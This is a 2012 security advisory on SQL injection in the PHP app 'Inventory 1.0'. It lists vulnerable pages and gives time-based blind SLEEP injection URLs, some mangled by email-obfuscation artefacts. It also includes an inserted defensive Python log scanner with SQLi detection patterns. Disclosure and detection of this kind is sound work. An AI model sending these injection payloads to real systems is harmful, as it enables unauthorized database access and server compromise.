SECURITYVULNS:DOC:28692 (Oct 29, 2012 - 12:00 a.m.)

Inventory 1.0 Multiple SQL Vulnerabilities

Published 2012-10-29 00:00:00 (vulners.com)

Exploit Title: Inventory 1.0 Multiple SQL Vulnerabilities

Date: 10/19/12

Author: G13

Twitter: @g13net

Software Site: https://github.com/farevalod/inventory

Version: 1.0

Category: webapp (php)

dc585

ToC

0x01 Description
0x02 SQL Injection
0x03 Vendor Notification

0x01 Description

PHP + SQL Inventory tracking system

0x02 SQL Injection

The Inventory application has multiple pages and parameters that are
vulnerable to SQL injection. These vulnerabilities could be used to
extract information from the database or to take remote control of
the server.

-----Vulnerable Pages-----

http://localhost/inventory/consulta_fact.php?fact_num=[SQLi]
http://localhost/inventory/addinventario.php?ref=[SQLi]&sn=[SQLi]&factura=[SQLi]
http://localhost/inventory/newtransact.php?ref=[SQLi]

-----PoC Exploits-----

http://localhost/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5)
http://localhost/inventory/[email protected]' AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555-[email protected]' AND SLEEP(5) AND 'IgkP'='IgkP&[email protected]' AND SLEEP(5) AND 'CFdY'='CFdY
http://localhost/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5) AND 'wIUB'='wIUB
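As an added defender-side example (not part of this advisory or of the Inventory project), the following Python checks access-log requests to the three pages listed above for the time-based blind payload shape the PoCs use, and for parameter values that do not match the shape the application should accept. The expected value shapes, the Apache-style log format and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages and parameters named in the advisory. The value shapes are an
# assumption about what each parameter should legitimately carry
# (integer invoice numbers, plain reference tokens), not project code.
EXPECTED = {
    "/inventory/consulta_fact.php": {"fact_num": r"\d+"},
    "/inventory/addinventario.php": {"ref": r"[\w-]+", "sn": r"[\w-]+", "factura": r"\d+"},
    "/inventory/newtransact.php": {"ref": r"[\w-]+"},
}

# Markers typical of the injected payloads shown in the advisory:
# a timing primitive, a quoted tautology after AND/OR, or UNION SELECT.
SQLI_MARKERS = re.compile(
    r"(?i)\b(sleep|benchmark)\s*\(|\b(and|or)\s+'[^']*'\s*=\s*'|\bunion\s+select\b"
)

# Minimal Apache combined/common log line: client IP and request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)')


def check_request(target):
    """Return [(param, reason), ...] for one request target; [] if clean."""
    parts = urlsplit(target)
    rules = EXPECTED.get(parts.path)
    if rules is None:
        return []  # page not covered by the advisory
    findings = []
    # parse_qs percent-decodes values, so %27 / %20 become ' and space.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        pattern = rules.get(name)
        if pattern is None:
            continue
        for value in values:
            if SQLI_MARKERS.search(value):
                findings.append((name, "sqli-marker"))
            elif not re.fullmatch(pattern, value):
                findings.append((name, "unexpected-shape"))
    return findings


def scan_log(lines):
    """Return (ip, target, findings) for every log line with a suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := check_request(m.group("target"))):
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


# Constructed sample lines (not real traffic); the second and third mirror the PoC payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Oct/2012:10:01:02 -0400] "GET /inventory/consulta_fact.php?fact_num=17 HTTP/1.1" 200 512',
    '10.0.0.9 - - [19/Oct/2012:10:01:09 -0400] "GET /inventory/consulta_fact.php?fact_num=17%20AND%20SLEEP(5) HTTP/1.1" 200 512',
    "10.0.0.9 - - [19/Oct/2012:10:01:15 -0400] \"GET /inventory/newtransact.php?ref=RSC-280%27%20AND%20SLEEP(5)%20AND%20%27wIUB%27=%27wIUB HTTP/1.1\" 200 311",
]
```

Run `scan_log(SAMPLE_LOG)` to get the two flagged requests from 10.0.0.9; the same `EXPECTED` shapes are what the application itself should enforce before any value reaches a query.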

0x03 Vendor Notification

10/19/12 - Vendor Notified
10/26/12 - No response, disclosure